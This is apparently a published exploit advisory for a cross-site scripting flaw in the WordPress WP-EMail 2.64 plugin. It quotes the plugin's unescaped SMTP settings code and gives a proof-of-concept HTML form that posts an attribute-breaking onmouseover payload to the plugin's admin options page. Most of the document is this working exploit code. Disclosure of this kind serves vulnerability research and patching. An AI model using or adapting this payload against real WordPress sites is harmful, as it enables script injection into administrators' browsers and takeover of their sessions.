###################### # Exploit Title : Wordpress WP-EMail 2.64 Cross Site Scripting # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : https://wordpress.org/plugins/wp-email/ # Date : 2015-01-03 # Software Link : https://downloads.wordpress.org/plugin/wp-email.2.64.zip # Tested on : Windows 7 / Mozilla Firefox ###################### # Location : http://localhost/wordpress/wp-admin/admin.php?page=wp-email/email-options.php ###################### # Vulnerable code : <table class="form-table"> <tr> <th width="20%"><?php _e('SMTP Username:', 'wp-email'); ?></th> <td><input type="text" name="email_smtp_name" value="<?php echo stripslashes($email_smtp['username']); ?>" size="30" dir="ltr" /></td> </tr> <tr> <th width="20%"><?php _e('SMTP Password:', 'wp-email'); ?></th> <td><input type="password" name="email_smtp_password" value="<?php echo stripslashes($email_smtp['password']); ?>" size="30" dir="ltr" /></td> </tr> <tr> <th width="20%"><?php _e('SMTP Server:', 'wp-email'); ?></th> <td><input type="text" name="email_smtp_server" value="<?php echo stripslashes($email_smtp['server']); ?>" size="30" dir="ltr" /><br /><?php _e('You may leave the above fields blank if you do not use a SMTP server.', 'wp-email'); ?></td> </tr> </table> ##################### Exploit Code: <html> <body> <form method="post" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wp-email/email-options.php"> <input type="hidden" name="email_smtp_name" value='" style="a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;" onmouseover=alert(1); a="'/> <input type="submit" name="Submit" class="button" value="Save Changes" /> </form> </body> </html> ##################### Discovered By : Nc_521 #####################